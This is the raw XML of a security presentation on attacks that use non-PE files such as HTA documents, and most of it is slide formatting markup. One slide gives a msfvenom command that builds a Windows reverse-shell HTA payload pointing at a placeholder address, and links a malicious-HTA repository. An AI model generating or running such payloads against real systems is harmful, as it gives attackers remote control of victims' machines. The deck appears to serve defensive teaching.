Target="https://www.interpol.int/Crime-areas/Cybercrime/Cybercrime/Botnet-Takedown/Qbot"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mailto:Ashu.Sharma@watchguard.com"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vulnerablelife.wordpress.com/2020/03/05/powershell-for-red-teams/"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cysinfo.com/cyber-attack-targeting-indian-navys-submarine-warship-manufacturer/"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hyperlink" Target="https://cysinfo.com/uri-terror-attack-spear-phishing-emails-targeting-indian-embassies-and-indian-mea/"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310651" y="2078964"/>
            <a:ext cx="8040688" cy="838199"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>Understanding advanced attacks that involve non-PE files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4424082" y="4630432"/>
            <a:ext cx="2359959" cy="562686"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Cristóbal Tárraga García</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8551863" y="-896938"/>
            <a:ext cx="592137"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A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742932" indent="-285744">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1142971" indent="-228594">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600160" indent="-228594">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057349" indent="-228594">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514537" indent="-228594" defTabSz="457189" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971726" indent="-228594" defTabSz="457189" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3428914" indent="-228594" defTabSz="457189" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886103" indent="-228594" defTabSz="457189" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{F3F47AA3-CABC-0647-8338-21F1737D6A23}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="3A3A3A"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="900">
              <a:solidFill>
                <a:srgbClr val="3A3A3A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E58D523-2E5D-431A-B410-B02560DAEC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9660" y="3275802"/>
            <a:ext cx="1167429" cy="1167429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:innerShdw blurRad="63500" dist="50800" dir="13500000">
              <a:prstClr val="black">
                <a:alpha val="50000"/>
              </a:prstClr>
            </a:innerShdw>
            <a:reflection blurRad="6350" stA="52000" endA="300" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A52F92B7-36F8-4D89-8DE6-1B7A3A68287E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2303878" y="4492850"/>
            <a:ext cx="1595667" cy="837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normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457189" indent="0" algn="ctr" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914377" indent="0" algn="ctr" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371566" indent="0" algn="ctr" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828754" indent="0" algn="ctr" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="A6A6A6"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285943" indent="0" algn="ctr" defTabSz="457189"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131" indent="0" algn="ctr" defTabSz="457189"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320" indent="0" algn="ctr" defTabSz="457189"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509" indent="0" algn="ctr" defTabSz="457189"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dirty="0"/>
              <a:t>Ashu Sharma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s-ES" dirty="0"/>
              <a:t>HTA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Documents</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>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400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Example of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> file that call calc.exe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Example reverse shell with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> LHOST=192.168.x.x LPORT=4444 -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hta-psh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> -o shell.hta</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/k4sth4/Malicious-HTA-File</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4779DBED-58CA-A0D7-0903-C5A9BD242527}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="860744" y="1125838"/>
            <a:ext cx="3125847" cy="1498590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3381515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s-ES" dirty="0"/>
              <a:t>HTA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Documents</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Marcador de contenido 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42637B30-23EC-2742-06F4-19927E8CA3C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2312610"/>
            <a:ext cx="5104174" cy="2337756"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBAB4D4F-7A58-49B8-0EEE-2690077918AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5652957" y="4070913"/>
            <a:ext cx="3070129" cy="579453"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Imagen 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE9593A-33D4-7602-BC0B-E784AA2B9A45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5684792" y="2312610"/>
            <a:ext cx="3038294" cy="1434864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CuadroTexto 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1314C7-5F59-AE6B-B6F2-D5C727221F15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="881175"/>
            <a:ext cx="8113486" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0"/>
              <a:t>Muid: 3FXXXXXXXXXXXXXXXXXXXXXXXXXXXX3B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0"/>
              <a:t>Fecha: 2023-04-28 08:11:26.883197000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0"/>
              <a:t>Alerta:{"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1"/>
              <a:t>contents</a:t>
            </a:r>
            <a:r>
